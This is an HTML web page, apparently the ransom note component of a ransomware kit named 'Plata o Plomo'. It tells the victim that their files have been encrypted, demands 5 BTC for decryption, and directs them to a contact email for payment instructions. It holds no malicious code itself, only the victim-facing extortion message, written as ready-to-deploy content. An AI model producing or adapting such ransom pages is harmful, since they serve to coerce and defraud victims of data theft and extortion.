<!DOCTYPE html>
<html lang="en">

<head>

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">

  <title>Plata o Plomo Ransomware!</title>

  <!-- Bootstrap Core CSS -->
  <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

  <!-- Custom Fonts -->
  <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,700,300italic,400italic,700italic" rel="stylesheet" type="text/css">
  <link href="vendor/simple-line-icons/css/simple-line-icons.css" rel="stylesheet">

  <!-- Custom CSS -->
  <link href="css/stylish-portfolio.min.css" rel="stylesheet">

</head>

<body id="page-top">

  <!-- Navigation -->
  <a class="menu-toggle rounded" href="#">
    <i class="fas fa-bars"></i>
  </a>
  <nav id="sidebar-wrapper">
    <ul class="sidebar-nav">
      <li class="sidebar-brand">
        <a class="js-scroll-trigger" href="#page-top">Plata o Plomo Ransomware</a>
      </li>
      <li class="sidebar-nav-item">
        <a class="js-scroll-trigger" href="#page-top">Information</a>
      </li>
      <li class="sidebar-nav-item">
        <a class="js-scroll-trigger" href="#about">What is Plata o Plomo Virus</a>
      </li>
      <li class="sidebar-nav-item">
        <a class="js-scroll-trigger" href="#about3">Can I Recover my files?</a>
      </li>
    </ul>
  </nav>

  <!-- Header -->
  <header class="masthead d-flex text-light">
    <div class="container text-center my-auto">
      <h3 class="mb-5">
        <em>Your Files are safe, for now</em>
      </h3>
      <a class="btn btn-primary btn-xl js-scroll-trigger" href="#about">What Happened to My Computer?</a>
    </div>
    <div class="overlay"></div>
  </header>

  <!-- About -->
  <section class="content-section bg-light" id="about">
    <div class="container text-center">
      <div class="row">
        <div class="col-lg-10 mx-auto">
          <h3  style="color:red;"> Your important files are encrypted by Virus Name Plata o Plomo !</h3>
		   <h2 style="padding-top:1.5em">What is Plata o Plomo?</h2>
          <p class="lead mb-5" style="font-weight: normal;">Your device is now ramsom. Your files are no longer accessible because they have been encrypted and it becomes impossible to access them. The only way to recover is to keep reading. 
           </p>
          <a class="btn btn-dark btn-xl js-scroll-trigger" href="#about3">Can I Recover my files?</a>
        </div>
      </div>
    </div>
  </section>

  
   <!-- About -->
  <section class="content-section bg-primary text-white text-center" id="about3">
    <div class="container text-center">
      <div class="row">
        <div class="col-lg-10 mx-auto">
          <h3  style="color:cyan;"> Hmm, that’s a good question ! </h3>
          <p style="font-weight: normal; font-size:150%">We are not hungry of money, but as it is a necessity, you have to pay 5BTC to decrypt. Contact us and we will give you further instructions.
        </div>
      </div>
    </div>
  </section>
   <!-- About -->
  <section class="content-section bg-dark text-white text-center"  id="download">
  <h2 style="color:#ffb6b6" > Our Email Address : decrypts@plataoplomo.com <h2>
    <div class="container text-center">

      <div class="row">
        <div class="col-lg-10 mx-auto"> 
</form>
<br><br>

<h3>Now Wait for our reply on your email inbox</h3>
		   <br>
		    <br>

  
 <br>
          <a class="btn btn-light btn-xl js-scroll-trigger" href="#about">Go to Top?</a>
        </div>
      </div>
    </div>
  </section>

  

  <!-- Scroll to Top Button-->
  <a class="scroll-to-top rounded js-scroll-trigger" href="#page-top">
    <i class="fas fa-angle-up"></i>
  </a>

  <!-- Bootstrap core JavaScript -->
  <script src="vendor/jquery/jquery.min.js"></script>
  <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

  <!-- Plugin JavaScript -->
  <script src="vendor/jquery-easing/jquery.easing.min.js"></script>

  <!-- Custom scripts for this template -->
  <script src="js/stylish-portfolio.min.js"></script>

</body>

</html>
